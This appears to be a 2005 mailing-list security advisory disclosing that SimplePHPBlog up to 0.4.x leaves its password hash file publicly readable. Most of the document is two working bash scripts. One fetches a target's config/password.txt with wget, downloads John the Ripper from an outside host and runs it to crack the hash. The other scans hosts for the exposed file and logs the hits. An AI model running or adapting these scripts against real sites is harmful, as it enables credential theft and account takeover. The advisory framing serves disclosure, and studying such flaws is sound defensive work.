<<< Date Index >>>     <<< Thread Index >>>

SimplePHPBlog 0.4.0 <= Remote Password Disclosure



           __       .__
______    |__|_____ |  | ___.__.
\____ \   |  \____ \|  |<   |  |
|  |_> >  |  |  |_> >  |_\___  |
|   __/\__|  |   __/|____/ ____|
|__|  \______|__|        \/        Where is the security? ...

Security Advisory 2005-0x00

Authors......... pjphem && LazyCrs
Date............ 07/07/2005
Vendor.......... www.simplephpblog.com
Type............ SimplePHPBlog 0.4.0 <= Remote Password Disclosure



o The Problem:
--------------


bash-3.00# cat install02.php

$result = create_folder( 'config' );

bash-3.00# cat sb_login.php

                // If there's no password file then need to redirect them.
                $passFile = 'config/password.txt';

                
----------------------------------------------------------------------------------------

                function create_password ( $user, $pass ) {
                // Generate and store password hash

                $mypasswd = $user.$pass;
                $hashed = crypt($mypasswd);

                // Save File
                $filename = 'config/password.txt';
                $result = sb_write_file( $filename, $hashed );

                 
----------------------------------------------------------------------------------------

                function check_password ( $user, $pass ) {
                // Check password against hashed password file

                $passFile = 'config/password.txt';
                $hashed = sb_read_file( $passFile );


bash-3.00# ls -l `pwd` |grep config
drwxrwxrwx   2 www-data www-data   216 Jul  7 01:13 config


o Proof of concept:
-------------------

bash-3.00$ cat 0xfuck-phpblog.sh
#!/bin/bash
###################################################################
#
# 0xfuck-phpblog.sh - SimplePHPBlog Remote Password Disclosure.  (for dummy)
#
# 0xpjply CONFIDENTIAL - SOURCE MATERIALS
#
# This is published proprietary source code of 0xpjply
#
# (C) COPYRIGHT 0xpjply security guru group, 2005
# All Rights Reserved
#
# dummy exploit written by pjphem && infected on July 2005
#
###################################################################
# contact:
#                  pjphem && LazyCrs
#
#         pjphem@xxxxxxxx && fLazyCrs@xxxxxxxxx
#
#Greetz:
#
#      You think you know?  You have no idea!
#                                             fluffi-
#
#
#
#                                                       RAFA FREE
#
###################################################################
echo ""
echo ""
echo "      +++++++++++++++++++++++++++++++++++++++++++++++++++++++++    "
echo "    =: SimplePHPBlog Remote Password Disclosure. - for dummy   :=   "
echo "      +++++++++++++++++++++++++++++++++++++++++++++++++++++++++    "
echo ""
echo "         c0de by pjphem  "
echo ""
echo ""
echo "           vulnerabili Simple php blog  0.4.4 <= "
echo ""
echo ""
echo -n "inserisci un hostname: " ; read hostname ;
echo -n "inserisci dir: " ; read dir ;
echo ""
echo "[*] praparando l'ambiente..."
mkdir 0xpjply
cd 0xpjply
echo -t3 "[*] OK!"
echo "[*] Cattura password..."
wget http://$hostname/$dir/config/password.txt
echo "[*] OK!"
echo ""
echo ""
echo "Show password: (md5)"
echo ""
cat password.txt
echo ""
rm -rf password.txt
echo ""
echo -n "Downloading John The Ripper (password decripter) ??  [Y/n] "
read Q
if [ $Q = y ];
    then echo "[*] OK!" ; wget http://broly.xelon.it/adv/john.tar.gz
else
    exit 1;
 fi
tar -zxf john.tar.gz
cd john
echo ""
echo "[*] Dowloading password.."
echo ""
wget http://$hostname/$dir/config/password.txt
echo ""
echo "Done!"
echo ""
echo "STARING John for decript password.. enJoy"
./jonh password.txt
echo ""
echo ""
bash-3.00$




bash-3.00$ cat 0xfuck-phpblog-scanner.sh
#!/bin/bash
#
# Simple tester for phpblog
#
#     phpblog  0.4.4 <=
#
#######################################
echo "host , directory blog: (ex. test.it blog)"
read HOST BLOG
lynx -source http://$HOST/$BLOG/config/password.txt | grep $1$ >> 0wn4bl3
bash-3.00$




---------------------------------------------------------------
Scegli il tuo dominio preferito e attiva la tua email! Da oggi
l'eMail di superEva e' ancora piu' veloce e ricca di funzioni!
http://webmail.supereva.it/new/
---------------------------------------------------------------